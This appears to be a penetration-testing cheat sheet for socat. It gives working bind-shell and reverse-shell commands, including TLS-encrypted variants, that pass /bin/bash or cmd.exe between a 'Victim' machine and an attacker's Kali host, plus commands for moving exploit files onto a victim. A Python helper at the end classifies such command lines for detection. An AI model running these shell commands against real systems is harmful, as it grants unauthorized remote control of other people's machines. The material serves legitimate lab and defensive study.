Socat

Socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. It is similar to Netcat, but it also supports encryption (TLS via OpenSSL).

Help

socat -h
socat -hh
socat -hhh
man socat

Client Mode

Connect to a TCP port

IP=x.x.x.x
PORT=443
socat - TCP4:$IP:$PORT

NOTE: socat gives no feedback when the connection is established; you only see output once the remote end sends data.

💡 For interacting with a specific service, see Ports & Protocols

Server Mode (listen)

💡 Use sudo for port numbers < 1024

sudo socat TCP4-LISTEN:443 STDOUT

File Transfer

Transfer file – From Server to Client

Server mode (e.g. Kali)

Anyone who connects to this port will receive the file.

sudo socat TCP4-LISTEN:443,fork file:~/exploit.py

Client mode (e.g. victim machine)

socat TCP4:$IP:443 file:received_exploit.py,create

Transfer file – From Client to Server

❗ Tentative, to validate 😉 Says connection refused but file was created.

Server mode (e.g. Kali)

sudo socat TCP4-LISTEN:443 file:~/received_exploit.py,create

Client mode (e.g. victim machine)

# -u sends the file one way (left to right). fork was dropped: on a connecting
# address it makes socat reconnect in a loop after the first transfer, which is
# what yields "connection refused" once the listener has exited. create only
# belongs on the receiving side.
socat -u file:~/exploit.py TCP4:$IP:443

Bind Shell

Client -> Bind shell -> Server

Server mode (Victim)

sudo socat TCP4-LISTEN:443,fork EXEC:/bin/bash   # Linux
socat TCP4-LISTEN:443,fork EXEC:cmd.exe,pipes    # Windows

Client mode (Kali)

socat - TCP4:$IP:443

Encrypted Bind Shell

Server mode (Victim)

# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:/bin/bash  # Linux
socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork EXEC:cmd.exe,pipes   # Windows

Client mode (Kali)

socat - OPENSSL:$IP:443,verify=0

Reverse Shell

Send a command shell to a host listening on a port.

Server mode (Kali)

-d -d: verbose

sudo socat -d -d TCP4-LISTEN:443 STDOUT

Client mode (Victim sends reverse shell to Kali)

socat TCP4:$IP:443 EXEC:/bin/bash       # Linux
socat TCP4:$IP:443 EXEC:cmd.exe,pipes   # Windows

💡 If netcat is not available on victim’s machine, use other reverse shells. Also see the reverse shell cheat sheet from HighOnCoffee.

Encrypted Reverse Shell

Server mode (Kali)

# Generate certificate for encryption, if applicable
openssl req -newkey rsa:2048 -nodes -keyout socat.key -x509 -days 362 -out socat.crt
cat socat.key socat.crt > socat.pem
sudo socat -d -d OPENSSL-LISTEN:443,cert=socat.pem,verify=0 STDOUT

Client mode (Victim sends reverse shell to Kali)

socat OPENSSL:$IP:443,verify=0 EXEC:/bin/bash      # Linux
socat OPENSSL:$IP:443,verify=0 EXEC:cmd.exe,pipes  # Windows
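Added example (not from the original cheat sheet): a small Python triage helper that classifies socat command lines such as the ones above, e.g. pulled from a process listing or shell history, into bind shell, reverse shell or file transfer, and flags verify=0 (the TLS peer is never authenticated, so anyone who finds the port can connect). The sample lines are constructed from this page with a made-up IP.

```python
import shlex
LISTEN_KINDS = {"TCP-LISTEN", "TCP4-LISTEN", "TCP6-LISTEN", "OPENSSL-LISTEN"}
CONNECT_KINDS = {"TCP", "TCP4", "TCP6", "OPENSSL"}

def parse_address(spec):
    """'OPENSSL-LISTEN:443,cert=x.pem,verify=0' -> ('OPENSSL-LISTEN', '443', {...}).
    Bare flags such as ,fork or ,pipes are stored with the value '1'."""
    kind, _, rest = spec.partition(":")
    target, *raw_opts = rest.split(",")
    opts = {}
    for item in raw_opts:
        key, _, value = item.partition("=")
        opts[key] = value or "1"
    return kind.upper(), target, opts

def classify(cmdline):
    # comments=True drops trailing '# Linux' style annotations
    tokens = [t for t in shlex.split(cmdline, comments=True) if t not in ("sudo", "socat")]
    # '-' is socat shorthand for STDIO; any other token starting with '-' is a flag
    specs = ["STDIO:" if t == "-" else t for t in tokens if t == "-" or not t.startswith("-")]
    addrs = [parse_address(s) for s in specs[:2]]
    kinds = {kind for kind, _, _ in addrs}
    if "EXEC" in kinds and kinds & LISTEN_KINDS:
        pattern = "bind shell"        # listener hands the accepted socket to a shell
    elif "EXEC" in kinds and kinds & CONNECT_KINDS:
        pattern = "reverse shell"     # outbound connection carries a shell
    elif "FILE" in kinds and kinds & (LISTEN_KINDS | CONNECT_KINDS):
        pattern = "file transfer"
    else:
        pattern = "other"
    tls = any(kind.startswith("OPENSSL") for kind in kinds)
    return {
        "pattern": pattern,
        "tls": tls,
        # verify=0 means the TLS peer is never authenticated; anyone can connect
        "tls_unauthenticated": tls and any(o.get("verify") == "0" for _, _, o in addrs),
        "fork": any("fork" in o for _, _, o in addrs),
    }

def triage(lines):
    """Return (pattern, line) pairs for every socat invocation found in lines."""
    return [(classify(l)["pattern"], l) for l in lines if "socat" in l.split()]

# Constructed sample lines, copied from this cheat sheet with a made-up IP.
SAMPLES = [
    "sudo socat TCP4-LISTEN:443,fork EXEC:/bin/bash   # Linux",
    "socat OPENSSL:10.0.0.5:443,verify=0 EXEC:cmd.exe,pipes  # Windows",
    "sudo socat TCP4-LISTEN:443,fork file:~/exploit.py",
    "socat - TCP4:10.0.0.5:443",
]
```

Feed `triage()` the output of `ps -eo args` or a shell history file to list every shell-carrying socat invocation on a host.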